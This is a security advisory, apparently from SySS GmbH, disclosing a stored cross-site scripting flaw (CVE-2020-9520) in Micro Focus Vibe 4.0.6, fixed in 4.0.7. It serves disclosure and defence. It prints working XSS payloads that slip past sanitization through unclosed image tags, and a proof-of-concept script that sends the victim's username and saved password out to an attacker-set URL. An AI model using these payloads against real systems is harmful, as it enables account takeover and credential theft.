Hash: SHA512  
Advisory ID: SYSS-2019-047  
Product: Micro Focus Vibe (formerly Novelle Vibe)  
Manufacturer: Micro Focus International plc  
Affected Version(s): 4.0.6  
Tested Version(s): 4.0.6  
Vulnerability Type: Cross-Site Scripting (CWE-79)  
Risk Level: Medium  
Solution Status: Fixed  
Manufacturer Notification: 2019-11-07  
Solution Date: 2020-03-24  
Public Disclosure: 2020-03-25  
CVE Reference: CVE-2020-9520  
Author of Advisory: Dr. Vladimir Bostanov, SySS GmbH  
Micro Focus Vibe is a web-based team collaboration platform that can  
serve as a knowledge repository, document management system, project  
collaboration hub, process automation machine, corporate intranet or  
extranet [1].  
The manufacturer describes the product as follows (see [2]):  
"Micro Focus Vibe (formerly Novell Vibe) brings people, projects, and  
processes together in one secure place to enhance team productivity --  
no matter where the team is or what devices they use."  
Due to insufficient server-side validation of user input and  
client-side rectification of HTML markup, Vibe is vulnerable  
to stored cross-site scripting (XSS).  
Vulnerability Details:  
In Vibe, an uploaded file can be assigned a title that is different  
from the filename. While HTML markup is not allowed in filenames, it is  
partially accepted in file titles. This behavior per se already poses a  
certain security risk, because it can be exploited by an authenticated  
attacker to inject malicious HTML markup into the title of a file  
uploaded by the attacker (see our advisory SYSS-2019-046 [3]). User  
input is, however, subjected to server-side sanitization as a XSS  
prevention measure. For instance, the following XSS payload  
<img src=0 onerror="alert(0)">  
when submitted as (a part of) a file's title, is reduced to  
<img src=0 >  
If, however, the image tag is not closed, the 'onerror' string is not  
recognized as a HTML attribute. Thus, the following payload  
<img src=0 onerror="alert(0)" x=  
is stored unchanged on the server. When the page of the uploaded file  
is requested, the title is placed between anchor tags and then the HTML  
markup is rectified by Vibe's client-side scripts. As a result of this  
procedure, a part of the closing anchor tag is interpreted as the value  
of the 'x' attribute of the image element and put in quotation marks:  
<a...><img src="0" onerror="alert(0)" x="</a">  
Thus, the image tag is closed and, consequently, the JavaScript alert  
is triggered automatically.  
An authenticated attacker can exploit this vulnerability to inject  
malicious JavaScript code into a Vibe website. The injected code is  
stored permanently on the server and is executed automatically in the  
context of any authenticated victim visiting the afflicted page.  
Proof of Concept (PoC):  
Since file titles are truncated to 80 characters by Vibe's client-side  
scripts, the simple method presented above cannot be used to execute  
arbitrary JavaScript. The following workaround using Vibe's internal  
client-side function ss_loadJsFile() and the browser's local storage  
has proved successful in achieving this goal.  
As a first step, an authenticated attacker uploads a file with,  
e.g., the following title  
XSS1<img src=1 onerror="eval(localStorage.getItem(1))" x=  
Then, the attacker uploads a second file with, e.g., the following title  
XSS2<img src="" onerror="ss_loadJsFile(this.src,1)" x=  
Finally, the attacker creates, e.g., the following malicious script  
at the location  
"var xss_URL = '';"+  
"var xss_User = m_requestInfo['userLoginId'];"+  
"var xss_Pass = document.getElementById('j_passwordId').value;"+  
"xss_User = encodeURIComponent(xss_User);"+  
"xss_Pass = encodeURIComponent(xss_Pass);"+  
"new Image().src = xss_URL + '?u=' + xss_User + '&p=' + xss_Pass;"  
When an authenticated victim requests the page of the second file,  
ss_loadJsFile() is called automatically. As a result, the malicious  
JavaScript code is stored in the local storage, and the browser is  
redirected to the page of the first file. On this page, the JavaScript  
code is automatically retrieved from the local storage and executed by  
eval(). If the victim's password has been stored in the browser's  
password manager, it is sent together with the username to the location This works at least in Mozilla Firefox  
and Microsoft Edge. With a slight modification, it can be made to work  
in Google Chrome and Opera as well. (In the latter case, however,  
script execution would be triggered by a mouse click, e.g., when the  
victim leaves the page by clicking on some link or button.)  
Saving the malicious JavaScript in the local storage is necessary,  
because after a script is loaded by ss_loadJsFile(), the whole DOM is  
replaced by an empty document (<html></html>) and scripts that use  
information from the DOM do not work properly.  
The above example was chosen as a PoC, because it demonstrates how DOM  
data are exposed by the vulnerability. Potential exploitation scenarios  
are, however, by no means limited to this kind of credential theft. For  
instance, in another plausible attack, the attacker could simply  
replace the whole DOM by a fake Vibe login page prompting the victim to  
log in again, because of an alleged error. An attacker who is more  
interested in using the victim's hardware could launch, e.g., a  
cryptocurrency mining script. Many more different attack scenarios are  
possible as well.  
Upgrade Vibe to version 4.0.7.  
Disclosure Timeline:  
2019-10-27: Vulnerability discovered  
2019-11-07: Vulnerability reported to manufacturer  
2020-03-24: Patch released by manufacturer  
2020-03-25: Public disclosure of vulnerability  
[1] WikipediA Article on Novelle Vibe  
[2] Product website for Micro Focus Vibe  
[3] SySS Security Advisory SYSS-2019-046  
HTML Injection in Micro Focus Vibe  
[4] SySS Security Advisory SYSS-2019-047  
Stored Cross-Site Scripting (XSS) in Micro Focus Vibe  
[5] SySS Responsible Disclosure Policy  
This security vulnerability was found  
by Dr. Vladimir Bostanov of SySS GmbH.  
Public Key:  
Key ID: 0xA589542B  
Key Fingerprint: 4989 C59F D54B E926 3A81 E37C A7A9 1848 A589 542B  
The information provided in this security advisory is provided "as is"  
and without warranty of any kind. Details of this security advisory  
may be updated in order to provide as accurate information as possible.  
The latest version of this security advisory is available on the  
SySS GmbH web site.  
Creative Commons - Attribution (by) - Version 3.0